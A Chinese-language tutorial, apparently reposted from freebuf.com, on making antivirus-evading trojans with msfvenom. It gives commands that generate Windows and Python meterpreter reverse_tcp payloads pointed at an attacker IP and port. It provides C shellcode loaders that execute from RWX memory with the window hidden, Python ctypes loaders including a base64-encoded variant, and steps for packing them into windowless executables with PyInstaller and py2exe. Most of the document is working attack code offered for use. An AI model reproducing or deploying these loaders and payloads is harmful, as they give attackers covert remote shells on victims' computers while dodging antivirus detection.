msfvenom——木马免杀篇

msfvenom——木马免杀篇
       c语言执行
              生成shellcode.c
              c语言执行
              检查
       python语言执行
              方法一：python加载C代码
              方法2：py2exe打包编译exe
              方法3：base64编码

c语言执行

生成shellcode.c

msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c > shellcode.c

然后将生成的文件打开，复制十六进制代码，到结尾的分号。

c语言执行

复制到c语言中

 
 
//C语言执行shellcode的五种方法
 
#include <windows.h>
#include <stdio.h>
 
//data段可读写
#pragma comment(linker, “/section:.data,RWE”)
//不显示窗口
#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)
#pragma comment(linker, “/INCREMENTAL:NO”)
 
 
//一段打开Windows计算器(calc.exe)的shellcode  
unsigned char shellcode_calc[] =
“\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23”
“\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0”
“\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3”
“\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f”
“\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4”
“\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2”
“\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba”
“\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f”
“\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56”
“\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9”
“\xe4”;
 
unsigned char shellcode[] =
“\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b”
“\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b”
“\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24”
“\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a”
“\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0”
“\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c”
“\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a”
“\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2”
“\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f”
“\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52”
“\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33”
“\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56”
“\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52”
“\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42”
“\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58”
“\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f”
“\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89”
“\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08”;
 
typedef void (__stdcall *CODE) ();
 
 
//http://rshell.blog.163.com/blog/static/41619170201110302937361/
 
//第一种方法  
void RunShellCode_1()
{
 
    PVOID p = NULL;
    if ((p = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
       MessageBoxA(NULL, “申请内存失败”, “提醒”, MB_OK);
    if (!(memcpy(p, shellcode, sizeof(shellcode))))
       MessageBoxA(NULL, “写内存失败”, “提醒”, MB_OK);
 
    CODE code =(CODE)p;
 
    code();
 
}
 
//第二种方法  
void RunShellCode_2()
{
    ((void(*)(void))&shellcode)();
}
 
//第三种方法
void RunShellCode_3()
{
    __asm
    {
       lea eax, shellcode;
       jmp eax;
    }
}
 
//第四种方法  
void RunShellCode_4()
{
    __asm
    {
       mov eax, offset shellcode;
       jmp eax;
    }
}
 
//第五种方法  
void RunShellCode_5()
{
    __asm
    {
       mov eax, offset shellcode;
       _emit 0xFF;
       _emit 0xE0;
    }
}
 
void main()
{
    //RunShellCode_1();
    //RunShellCode_2();
    //RunShellCode_3();
    //RunShellCode_4();
    RunShellCode_5();
}

eg：

#include “pch.h”
#include <iostream>
#include “stdio.h”
#include “Windows.h”

#pragma comment(linker,”/subsystem:\”windows\” /entry:\”mainCRTStartup\””)                        //去除窗口
//步骤b所在桌面产生的 shellcode.c的内容;
unsigned char shellcode[] =

void main()

{
    //ShellExecute(NULL, _T(“open”), _T(“explorer.exe”), _T(“https://www.baiud.com”), NULL, SW_SHOW);
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void(*)())Memory)();
}

检查

查杀地址：http://r.virscan.org/language/zh-cn/report/dc322aacd4209d2a3366c9fb74a3442b

python语言执行

方法一：python加载C代码

import ctypes
 
shellcode = bytearray(“\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b”)
 
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
 
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
 
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
 
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

然后要使用PyInstaller将py转为exe，pyinstaller依赖于pywin32，在使用pyinstaller之前，应先安装pywin32。

pywin32下载后，点击下一步安装即可https://sourceforge.net/projects/pywin32/files/pywin32

pyinstaller 下载https://github.com/pyinstaller/pyinstaller/releases，解压，安装好依赖包pip install -r requirements.txt，即可使用。

将pyshellcode.py复制到C:\Python27_x86\pyinstaller目录中，在该目录下执行命令编译exe：

python pyinstaller.py -F -w pyshellcode.py

方法2：py2exe打包编译exe

该方法借用了免杀工具Python-Rootkit的思路。

首先要在windows上安装x86版的python。

注意：必须使用x86版本Python 2.7,即使Windows是x64的，也要安装32位版本。

我这里安装的是Python 2.7.16 x86 windows版：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi

之后安装32位Py2exe for python 2.7,https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

在Windows上安装OpenSSL（可选）

msfvenom生成python payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.211.55.2  LPORT=3333  -f raw -o shell.py

创建文件setup.py

from distutils.core import setup
 
import py2exe
 
setup(
 
name = “Meter”,
 
description = “Python-based App”,
 
version = “1.0”,
 
console = [“shell.py”],
 
options = {“py2exe”:{“bundle_files”:1,”packages”:”ctypes”,”includes”:”base64,sys,socket,struct,time,code,platform,getpass,shutil”,}},
 
zipfile = None
 
)

在msf中设置payloadwindows/meterpreter/reverse_tcp，监听相应3333端口。

在windows下执行python.exe .\setup.py py2exe，(文件大小11M)

方法3：base64编码

和2.1方法一样，先生成shellcode, 先用msfvenom生成shellcode，记得要用base64编码:

msfvenom -p windows/meterpreter/reverse_tcp –encrypt base64  LHOST=10.211.55.2 LPORT=3333   -f c

python代码如下：

import ctypes
import base64
 
encode_shellcode = “”
 
shellcode = base64.b64decode(encode_shellcode)
 
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

使用pyinstaller编译打包exe

python pyinstaller.py -F -w pyshellcode.py

来源：freebuf.com 2020-08-12 18:11:59 by: tomyyyyy